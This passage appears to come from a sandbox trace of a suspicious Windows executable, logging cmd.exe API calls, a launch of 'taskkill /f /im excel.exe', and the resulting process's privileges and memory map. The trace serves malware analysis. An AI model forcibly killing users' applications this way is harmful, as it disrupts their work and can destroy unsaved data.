(_String1="taskkill", _String2="MD") returned 7 [0204.398] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0204.398] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0204.398] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0204.398] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0204.398] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0204.398] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0204.398] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0204.398] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0204.398] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0204.398] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0204.398] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0204.398] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0204.398] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0204.398] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0204.398] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0204.398] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0204.398] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0204.398] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0204.398] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0204.398] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0204.398] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0204.398] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0204.399] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0204.399] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0204.399] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0204.399] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0204.399] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0204.399] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0204.399] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0204.399] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0204.399] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0204.399] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0204.399] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0204.399] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0204.399] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0204.399] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0204.399] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0204.399] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0204.399] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0204.399] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0204.399] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0204.399] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0204.399] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0204.399] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0204.399] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0204.399] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0204.399] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0204.399] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0204.399] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0204.399] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0204.399] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0204.399] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0204.399] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0204.400] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0204.400] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0204.400] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0204.400] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0204.400] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0204.400] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0204.400] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0204.400] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0204.400] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0204.400] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0204.400] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0204.400] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0204.400] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0204.400] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0204.400] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0204.400] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0204.400] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0204.400] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0204.400] GetProcessHeap () returned 0x510000 [0204.401] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x51ad08 [0204.401] GetProcessHeap () returned 0x510000 [0204.401] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x40) returned 0x51af20 [0204.401] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0204.401] GetProcessHeap () returned 0x510000 [0204.401] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x418) returned 0x5105c8 [0204.401] SetErrorMode (uMode=0x0) returned 0x8003 [0204.401] SetErrorMode (uMode=0x1) returned 0x0 [0204.401] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5105d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0204.401] SetErrorMode (uMode=0x8003) returned 0x1 [0204.401] GetProcessHeap () returned 0x510000 [0204.401] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5105c8, Size=0x56) returned 0x5105c8 [0204.401] GetProcessHeap () returned 0x510000 [0204.401] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5105c8) returned 0x56 [0204.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0204.401] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.401] GetProcessHeap () returned 0x510000 [0204.402] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x110) returned 0x51af68 [0204.402] GetProcessHeap () returned 0x510000 [0204.402] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x218) returned 0x510628 [0204.407] GetProcessHeap () returned 0x510000 [0204.407] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x510628, Size=0x112) returned 0x510628 [0204.407] GetProcessHeap () returned 0x510000 [0204.407] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x510628) returned 0x112 [0204.407] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0204.407] GetProcessHeap () returned 0x510000 [0204.407] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe0) returned 0x51b080 [0204.409] GetProcessHeap () returned 0x510000 [0204.409] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51b080, Size=0x76) returned 0x51b080 [0204.409] GetProcessHeap () returned 0x510000 [0204.409] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51b080) returned 0x76 [0204.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.409] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0204.410] GetLastError () returned 0x2 [0204.410] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.410] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x51b100 [0204.410] GetProcessHeap () returned 0x510000 [0204.410] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5174d8 [0204.410] FindClose (in: hFindFile=0x51b100 | out: hFindFile=0x51b100) returned 1 [0204.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0204.411] GetLastError () returned 0x2 [0204.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x51b100 [0204.411] GetProcessHeap () returned 0x510000 [0204.411] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5174d8, Size=0x4) returned 0x510538 [0204.411] FindClose (in: hFindFile=0x51b100 | out: hFindFile=0x51b100) returned 1 [0204.411] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0204.411] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0204.411] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0204.461] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0204.461] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0204.462] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130)) [0204.462] GetProcessHeap () returned 0x510000 [0204.462] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x517738 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.463] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.463] GetProcessHeap () returned 0x510000 [0204.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x517738) returned 1 [0204.463] GetProcessHeap () returned 0x510000 [0204.463] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa) returned 0x51b100 [0204.463] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.468] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im excel.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im excel.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im excel.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xe2c, dwThreadId=0xfd0)) returned 1 [0204.487] CloseHandle (hObject=0x98) returned 1 [0204.487] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.487] GetProcessHeap () returned 0x510000 [0204.488] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x519d88) returned 1 [0204.488] GetEnvironmentStringsW () returned 0x519d88* [0204.488] GetProcessHeap () returned 0x510000 [0204.488] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa76) returned 0x51bc88 [0204.488] FreeEnvironmentStringsA (penv="=") returned 1 [0204.488] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0205.908] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0205.908] CloseHandle (hObject=0x9c) returned 1 [0205.909] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0205.910] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0205.910] GetProcessHeap () returned 0x510000 [0205.911] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51bc88) returned 1 [0205.911] GetEnvironmentStringsW () returned 0x51b130* [0205.911] GetProcessHeap () returned 0x510000 [0205.911] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa9c) returned 0x51bbd8 [0205.911] FreeEnvironmentStringsA (penv="=") returned 1 [0205.911] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.911] GetProcessHeap () returned 0x510000 [0205.911] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51bbd8) returned 1 [0205.912] GetEnvironmentStringsW () returned 0x51b130* [0205.912] GetProcessHeap () returned 0x510000 [0205.912] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa9c) returned 0x51bbd8 [0205.912] FreeEnvironmentStringsA (penv="=") returned 1 [0205.912] GetProcessHeap () returned 0x510000 [0205.912] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51b100) returned 1 [0205.912] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0205.912] _get_osfhandle (_FileHandle=1) returned 0x158 [0205.912] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x158 [0205.912] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0205.912] _get_osfhandle (_FileHandle=0) returned 0x154 [0205.912] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0205.912] GetConsoleOutputCP () returned 0x1b5 [0205.950] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0205.950] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.952] exit (_Code=128) Thread: id = 294 os_tid = 0xab0 Process: id = "57" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x11759000" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0xa08" cmd_line = "taskkill /f /im excel.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4153 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4154 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4155 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4156 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4157 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4158 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4159 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4160 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4161 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4162 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4163 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4164 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4165 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4166 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4167 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4168 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4169 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4170 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4316 start_va = 0x41d0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 4317 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4318 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4319 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4320 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4321 start_va = 0x4400000 end_va = 0x450ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4322 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4323 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4324 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4325 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4326 start_va = 0x4510000 end_va = 0x45cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4327 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4328 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4329 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4330 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 4331 start_va = 0x4170000 end_va = 0x41affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 4332 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4333 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4334 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4335 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4336 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4337 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4338 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4339 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4340 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4341 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4342 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name 